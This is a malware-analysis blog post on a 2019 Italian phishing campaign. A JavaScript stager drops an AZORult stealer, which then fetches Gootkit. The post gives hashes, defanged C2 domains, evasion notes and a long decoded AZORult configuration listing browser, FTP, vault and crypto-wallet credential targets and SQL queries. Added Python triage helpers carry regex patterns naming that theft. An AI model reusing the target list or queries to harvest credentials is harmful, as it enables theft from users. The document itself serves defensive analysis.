Gootkit: Unveiling the Hidden Link with AZORult

Pierluigi Paganini February 12, 2019

Cybaze-Yoroi ZLAB revealed an interesting hidden connection between the AZORult toolkit and a specific Gootkit payload.

Introduction

In recent days, a large attack campaign hit several organizations across the Italian cyberspace; as stated in bulletin N020219, the attack waves tried to impersonate legitimate communications from a well-known express courier. However, a deeper analysis by Cybaze-Yoroi ZLAB revealed interesting hidden aspects, spotting a connection between the AZORult toolkit and a particular Gootkit payload.

Technical analysis

Stage 1 – The Attached Javascript

Most of the infection attempts started with a particular email attachment: a compressed archive containing stealthy JavaScript code, most of the time able to avoid antivirus detection during the initial stages of the attack campaigns.

Hash: 12791e14ba82d36d434e7c7c0b81c7975ce802a430724f134b7e0cce5a7bb185
Threat: malicious js
Desc: Obfuscated malicious JS. It downloads the first component and keeps communicating with the C2 server.

Table 1:  Generic information about malicious js file

This JS file is an obfuscated dropper whose purpose is to download another component from a “safe” remote location:

Figure 1: Snippet from the JavaScript attachment

It contacts two distinct servers, googodsgld[.]com and driverconnectsearch[.]info. The behaviour of this sort of JavaScript stager is as essential as it is interesting: it downloads other executable code able to do virtually anything the attacker wants. This kind of pattern and the simplicity of the code itself loosely resemble the Brushaloader threat, a known dropper/stager written in VBScript that contacts its remote infrastructure in a similar manner. We can hypothesize that the malware writers may have emulated the Brushaloader stager functionalities, creating a sort of custom version exploiting the same mechanism.

Figure 2: Classic Brushaloader sample (left) along with the recent Javascript stager (right)
Figure 3: Encrypted communication with driverconnectsearch[.]info server

After the first contact attempt to googodsgld[.]com, the script communicates with the other destination and retrieves a Cabinet archive encoded within the chunk of executable JavaScript code returned by driverconnectsearch[.]info. Then it stores it in “%APPDATA%\Local\Temp\”.

As shown in Figure 3, the first characters of the encoded payload string are “TVNDRg”, which base64-decodes to “MSCF”: the standard header of the Microsoft Cabinet compressed file format.

Figure 4: JavaScript downloaded from driverconnectsearch[.]info server.
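The “TVNDRg” check described above, turned into a small triage helper that carves base64-encoded Cabinet archives out of a returned script and parses their fixed header. This is an added example, not code from the Yoroi analysis; the script text it scans is constructed inline and the CAB inside it is a synthetic header with zero padding, not the real payload.

```python
import base64
import re
import struct

# Fixed part of a Cabinet CFHEADER: signature, reserved1, cbCabinet, reserved2,
# coffFiles, reserved3, versionMinor, versionMajor, cFolders, cFiles, flags, setID, iCabinet
CFHEADER = struct.Struct("<4sIIIIIBBHHHHH")          # 36 bytes

def cab_header(blob: bytes) -> dict:
    """Parse the fixed CFHEADER fields of a Microsoft Cabinet file."""
    (sig, _r1, cb_cabinet, _r2, coff_files, _r3, ver_minor, ver_major,
     c_folders, c_files, flags, _set_id, _i_cabinet) = CFHEADER.unpack_from(blob)
    if sig != b"MSCF":
        raise ValueError("not a CAB file")
    return {"cbCabinet": cb_cabinet, "coffFiles": coff_files, "cFolders": c_folders,
            "cFiles": c_files, "flags": flags, "version": f"{ver_major}.{ver_minor}"}

# "TVNDRg" is the base64 encoding of the CAB signature "MSCF"; from there the
# regex extends over the rest of the base64 run (and any '=' padding).
B64_CAB_RE = re.compile(r"TVNDRg[A-Za-z0-9+/]*={0,2}")

def carve_cabs(script: str) -> list:
    """Return (offset, cab_bytes, header) for every base64-encoded CAB found in script."""
    hits = []
    for m in B64_CAB_RE.finditer(script):
        try:
            blob = base64.b64decode(m.group(0), validate=True)
        except ValueError:                  # binascii.Error: not a clean base64 run after all
            continue
        if len(blob) < CFHEADER.size:
            continue
        hdr = cab_header(blob)
        if hdr["cbCabinet"] > len(blob):    # header claims more bytes than decoded: truncated
            continue
        hits.append((m.start(), blob[:hdr["cbCabinet"]], hdr))
    return hits

def _constructed_cab(size: int = 0x800) -> bytes:
    """Synthetic CAB: a valid CFHEADER followed by zero padding (no real archive data)."""
    hdr = CFHEADER.pack(b"MSCF", 0, size, 0, CFHEADER.size, 0, 3, 1, 1, 1, 0, 0, 0)
    return hdr + b"\x00" * (size - CFHEADER.size)

# Constructed stand-in for the JavaScript the C2 returned (Figure 4): the archive
# sits in a string literal that the stager would decode and write to %TEMP%.
SAMPLE_JS = 'function d(){var s="' + base64.b64encode(_constructed_cab()).decode() + '";return s;}'

if __name__ == "__main__":
    for off, cab, hdr in carve_cabs(SAMPLE_JS):
        print(f"CAB at script offset {off}: {len(cab)} bytes, {hdr['cFiles']} file(s), v{hdr['version']}")
```

On a real capture the carved bytes can be handed to a CAB extractor; the header fields alone already tell you whether the blob is complete before you expand it.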

Stage 2 – The Cabinet

Actually, this .CAB archive is just a shell for a PE32 executable file:

Hash: 2274174ed24425f41362aa207168b491e6fb55cab208116070f91c049946097a
Threat: RuntimeBroker5.exe
Desc: First component downloaded by the malicious js file.

Table 2:  Generic information about RuntimeBroker5.exe (AZORult)

When executed, the RuntimeBroker5.exe sample behaves as another dropper: it downloads two other components from the remote server “hairpd[.]com”.

Figure 5: RuntimeBroker5.exe process execution

The sample file actually does not perform only this download. Here is one of the key points of the article: it also establishes a communication channel with the AZORult C2 host “ssl[.]admin[.]itybuy[.]it”.

The network packets exchanged with the server confirm this identification due to the known communication patterns, and the dynamic analysis also shows info-stealing behaviours compatible with the identified threat.

As shown in the following figure, the files written in the “%APPDATA%\Local\Temp\” path closely match the AZORult analysis described by the Unit42 research group.

Figure 6: Evidence of the similarity of RuntimeBroker5.exe and AZORult malware variant analyzed by UNIT42
Figure 7: C2 Communication comparison

During the dynamic analysis, the RuntimeBroker5.exe sample received a sort of configuration file from the C2 server. We extracted it from the running malware image and decoded it:

  1. firefox.exe
  2. SOFTWARE\Wow6432Node\Mozilla\Mozilla Firefox\
  3. SOFTWARE\Mozilla\Mozilla Firefox
  4. SOFTWARE\Clients\StartMenuInternet\FIREFOX.EXE\shell\open\command
  5. SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\firefox.exe
  6. %appdata%\Mozilla\Firefox\Profiles\
  7. MozillaFireFox
  8. CurrentVersion
  9. Install_Directory
  10. nss3.dll
  11. thunderbird.exe
  12. SOFTWARE\Wow6432Node\Mozilla\Mozilla Thunderbird\
  13. SOFTWARE\Mozilla\Mozilla Thunderbird
  14. SOFTWARE\Classes\ThunderbirdEML\DefaultIcon
  15. %appdata%\Thunderbird\Profiles\
  16. ThunderBird
  17. SELECT host, path, isSecure, expiry, name, value FROM moz_cookies
  18. SELECT fieldname, value FROM moz_formhistory
  19. NSS_Init
  20. PK11_GetInternalKeySlot
  21. PK11_Authenticate
  22. PK11SDR_Decrypt
  23. NSS_Shutdown
  24. PK11_FreeSlot
  25. logins.json
  26. logins
  27. hostname
  28. timesUsed
  29. encryptedUsername
  30. encryptedPassword
  31. cookies.sqlite
  32. formhistory.sqlite
  33. %LOCALAPPDATA%\Google\Chrome\User Data\
  34. %LOCALAPPDATA%\Google\Chrome SxS\User Data\
  35. %LOCALAPPDATA%\Xpom\User Data\
  36. %LOCALAPPDATA%\Yandex\YandexBrowser\User Data\
  37. %LOCALAPPDATA%\Comodo\Dragon\User Data\
  38. %LOCALAPPDATA%\Amigo\User Data\
  39. %LOCALAPPDATA%\Orbitum\User Data\
  40. %LOCALAPPDATA%\Bromium\User Data\
  41. %LOCALAPPDATA%\Chromium\User Data\
  42. %LOCALAPPDATA%\Nichrome\User Data\
  43. %LOCALAPPDATA%\RockMelt\User Data\
  44. %LOCALAPPDATA%\360Browser\Browser\User Data\
  45. %LOCALAPPDATA%\Vivaldi\User Data\
  46. %APPDATA%\Opera Software\
  47. %LOCALAPPDATA%\Go!\User Data\
  48. %LOCALAPPDATA%\Sputnik\Sputnik\User Data\
  49. %LOCALAPPDATA%\Kometa\User Data\
  50. %LOCALAPPDATA%\uCozMedia\Uran\User Data\
  51. %LOCALAPPDATA%\QIP Surf\User Data\
  52. %LOCALAPPDATA%\Epic Privacy Browser\User Data\
  53. %APPDATA%\brave\
  54. %LOCALAPPDATA%\CocCoc\Browser\User Data\
  55. %LOCALAPPDATA%\CentBrowser\User Data\
  56. %LOCALAPPDATA%\7Star\7Star\User Data\
  57. %LOCALAPPDATA%\Elements Browser\User Data\
  58. %LOCALAPPDATA%\TorBro\Profile\
  59. %LOCALAPPDATA%\Suhba\User Data\
  60. %LOCALAPPDATA%\Safer Technologies\Secure Browser\User Data\
  61. %LOCALAPPDATA%\Rafotech\Mustang\User Data\
  62. %LOCALAPPDATA%\Superbird\User Data\
  63. %LOCALAPPDATA%\Chedot\User Data\
  64. %LOCALAPPDATA%\Torch\User Data\
  65. GoogleChrome
  66. GoogleChrome64
  67. InternetMailRu
  68. YandexBrowser
  69. ComodoDragon
  70. Amigo
  71. Orbitum
  72. Bromium
  73. Chromium
  74. Nichrome
  75. RockMelt
  76. 360Browser
  77. Vivaldi
  78. Opera
  79. GoBrowser
  80. Sputnik
  81. Kometa
  82. Uran
  83. QIPSurf
  84. Epic
  85. Brave
  86. CocCoc
  87. CentBrowser
  88. 7Star
  89. ElementsBrowser
  90. TorBro
  91. Suhba
  92. SaferBrowser
  93. Mustang
  94. Superbird
  95. Chedot
  96. Torch
  97. Login Data
  98. Web Data
  99. SELECT origin_url, username_value, password_value FROM logins
  100. SELECT host_key, name, encrypted_value, value, path, secure, (expires_utc/1000000)-11644473600 FROM cookies
  101. SELECT host_key, name, name, value, path, secure, expires_utc FROM cookies
  102. SELECT name, value FROM autofill
  103. SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted value FROM credit_cards
  104. %APPDATA%\Microsoft\Windows\Cookies\
  105. %APPDATA%\Microsoft\Windows\Cookies\Low\
  106. %LOCALAPPDATA%\Microsoft\Windows\INetCache\
  107. %LOCALAPPDATA%\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\INetCookies\
  108. %LOCALAPPDATA%\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cookies\
  109. %LOCALAPPDATA%\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!002\MicrosoftEdge\Cookies\
  110. %LOCALAPPDATA%\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\Cookies\
  111. InternetExplorer
  112. InternetExplorerLow
  113. InternetExplorerINetCache
  114. MicrosoftEdge_AC_INetCookies
  115. MicrosoftEdge_AC_001
  116. MicrosoftEdge_AC_002
  117. MicrosoftEdge_AC
  118. Software\Microsoft\Internet Explorer
  119. Software\Microsoft\Internet Explorer\IntelliForms\Storage2
  120. Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
  121. Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook
  122. Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook
  123. POP3
  124. IMAP
  125. SMTP
  126. HTTP
  127. %appdata%\Waterfox\Profiles\
  128. Waterfox
  129. %appdata%\Comodo\IceDragon\Profiles\
  130. IceDragon
  131. %appdata%\8pecxstudios\Cyberfox\Profiles\
  132. Cyberfox
  133. sqlite3_open
  134. sqlite3_close
  135. sqlite3_prepare_v2
  136. sqlite3_step
  137. sqlite3_column_text
  138. sqlite3_column_bytes
  139. sqlite3_finalize
  140. %APPDATA%\filezilla\recentservers.xml
  141. <RecentServers>
  142. </RecentServers>
  143. <Server>
  144. </Server>
  145. <Host>
  146. </Host>
  147. <Port>
  148. </Port>
  149. <User>
  150. </User>
  151. <Pass>
  152. </Pass>
  153. <Pass encoding="base64">
  154. FileZilla
  155. ole32.dll
  156. CLSIDFromString
  157. {4BF4C442-9B8A-41A0-B380-DD4A704DDB28}
  158. {3CCD5499-87A8-4B10-A215-608888DD3B55}
  159. vaultcli.dll
  160. VaultOpenVault
  161. VaultEnumerateItems
  162. VaultGetItem
  163. MicrosoftEdge
  164. Browsers\AutoComplete
  165. CookieList.txt
  166. SELECT host_key, name, encrypted_value, value, path, is_secure, (expires_utc/1000000)-11644473600 FROM cookies
  167. %appdata%\Moonchild Productions\Pale Moon\Profiles\
  168. PaleMoon
  169. %appdata%\Electrum\wallets\
  170. \Electrum
  171. %appdata%\Electrum-LTC\wallets\
  172. \Electrum-LTC
  173. %appdata%\ElectrumG\wallets\
  174. \ElectrumG
  175. %appdata%\Electrum-btcp\wallets\
  176. \Electrum-btcp
  177. %APPDATA%\Ethereum\keystore\
  178. \Ethereum
  179. %APPDATA%\Exodus\
  180. \Exodus
  181. \Exodus Eden
  182. *.json,*.seco
  183. %APPDATA%\Jaxx\Local Storage\
  184. \Jaxx\Local Storage\
  185. %APPDATA%\MultiBitHD\
  186. \MultiBitHD
  187. mbhd.wallet.aes,mbhd.checkpoints,mbhd.spvchain,mbhd.yaml
  188. .wallet
  189. wallets\.wallet
  190. wallet.dat
  191. wallets\wallet.dat
  192. electrum.dat
  193. wallets\electrum.dat
  194. Software\monero-project\monero-core
  195. wallet_path
  196. Bitcoin\Bitcoin-Qt
  197. BitcoinGold\BitcoinGold-Qt
  198. BitCore\BitCore-Qt
  199. Litecoin\Litecoin-Qt
  200. BitcoinABC\BitcoinABC-Qt
  201. %APPDATA%\Exodus Eden\
  202. %Appdata%\Psi+\profiles\
  203. %Appdata%\Psi\profiles\
  204. <roster-cache>
  205. </roster-cache>
  206. <jid type="QString">
  207. <password type="QString">
  208. </password>

Table 3: AZORult Configuration file

The multiple references to browser cookies and crypto wallets confirm that the “RuntimeBroker5.exe” sample, initially hidden inside the cabinet archive, is an AZORult variant.
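A triage helper for a decoded configuration of this kind, added here as an example and not part of the Yoroi analysis: it buckets each string by what it targets, so the browser-cookie, credential and wallet references the conclusion relies on can be counted rather than eyeballed. The excerpt it runs on is constructed from a handful of Table 3 entries; the category names and the stealer heuristic are this example's own.

```python
import re

# Constructed excerpt of a decoded AZORult configuration, one string per line as in
# Table 3 (the real dump is a few hundred entries). Raw string: backslashes are literal.
CONFIG_DUMP = r"""
SOFTWARE\Mozilla\Mozilla Firefox
%appdata%\Mozilla\Firefox\Profiles\
SELECT host, path, isSecure, expiry, name, value FROM moz_cookies
PK11SDR_Decrypt
logins.json
%LOCALAPPDATA%\Google\Chrome\User Data\
SELECT origin_url, username_value, password_value FROM logins
SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted value FROM credit_cards
%APPDATA%\filezilla\recentservers.xml
vaultcli.dll
VaultEnumerateItems
%appdata%\Electrum\wallets\
wallet.dat
Software\monero-project\monero-core
<password type="QString">
"""

# First matching rule wins, so the more specific patterns come first.
RULES = [
    ("browser_profile_path", re.compile(r"%(?:LOCAL)?APPDATA%\\.*(?:User Data|Profiles)\\", re.I)),
    ("browser_sql_query",    re.compile(r"^SELECT .+ FROM (?:moz_\w+|logins|cookies|autofill|credit_cards)$", re.I)),
    ("firefox_nss_api",      re.compile(r"^(?:NSS_|PK11)")),
    ("windows_vault_api",    re.compile(r"^(?:Vault\w+|vaultcli\.dll)$")),
    ("ftp_client",           re.compile(r"filezilla", re.I)),
    ("crypto_wallet",        re.compile(r"wallets?\\|wallet\.dat|monero|Ethereum|Exodus|Jaxx|MultiBit|Bitcoin|Litecoin", re.I)),
    ("credential_file",      re.compile(r"^(?:logins\.json|cookies\.sqlite|formhistory\.sqlite|Login Data|Web Data)$")),
    ("registry_key",         re.compile(r"^SOFTWARE\\", re.I)),
]

def classify(entry: str) -> str:
    """Map one configuration string to the kind of data it targets."""
    for label, rx in RULES:
        if rx.search(entry):
            return label
    return "other"

def summarize(dump: str) -> dict:
    """Count configuration entries per category (blank lines ignored)."""
    counts: dict = {}
    for line in dump.splitlines():
        if line.strip():
            label = classify(line.strip())
            counts[label] = counts.get(label, 0) + 1
    return counts

def looks_like_stealer(counts: dict) -> bool:
    """Heuristic: credential-harvesting logic (SQL queries, NSS/Vault APIs) plus wallet targets."""
    harvest = sum(counts.get(k, 0) for k in ("browser_sql_query", "firefox_nss_api", "windows_vault_api"))
    return harvest >= 3 and counts.get("crypto_wallet", 0) > 0
```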

Stage 3 – The Payload

The other file downloaded from hairpd[.]com by the AZORult sample is another PE32 executable.

Figure 8: GET request to download the payload.
Hash: a75b318eb2ae6678fd15f252d6b33919203262eb59e08ac32928f8bad54ca612
Threat: sputik.exe
Short description: Second component downloaded by the malware. This component stays alive after the infection.

Table 4:  Generic information about sputik.exe (Gootkit)

The “sputik.exe” sample uses a set of evasion techniques to detect monitoring of the process, such as invoking the “UuidCreateSequential” API to check for MAC addresses typical of virtual machines; this technique can be easily bypassed by spoofing the MAC address of a real network card.

Figure 9: Evasion technique through the check “UuidCreateSequential” API call

Bypassing all the evasion techniques reveals the nature of the payload: a Gootkit malware implant.

Figure 10: Command line of the final sample

By instrumenting the execution of the implant, we were able to extract part of the JavaScript code of the malware. The Gootkit implant contains several modules written on top of NodeJS technology and embedded into the PE file, which reveal part of the implant code.

Figure 11: Portion of Gootkit code snippet

In past years, the Gootkit source code has been leaked online and part of it is also available on GitHub. This allowed us to investigate the differences between the extracted snippets and the known, previously leaked, malware version.

Figure 12: Comparison between extracted Gootkit version and the leaked one

As a general consideration, we noticed a lot of similarities between the two code bases; they are perfectly compatible, but a few differences remain. For instance, private keys and certificates have been modified, showing that the malware author chose a stronger key.

Table 5:  Certificate comparison 
(New on the left, known/leaked on the right)

Conclusion

These attack waves targeting Italian organizations and users revealed interesting connections between two threats we used to monitor and detect across both the InfoSec community and the CERT-Yoroi constituency, revealing a hidden link between this particular AZORult instance and the Gootkit implant.

Also, the analysis pointed to an evolution of the dropping techniques used by cyber-criminals in the initial stages of the attacks, showing how the usage of extremely flexible stagers written in high-level languages, JavaScript in this case, is becoming more popular and needs to be carefully monitored.

Further details, including Indicators of Compromise (IoCs), are reported in the analysis published on the Yoroi Blog.


Pierluigi Paganini

(SecurityAffairs – AZORult, gootkit)
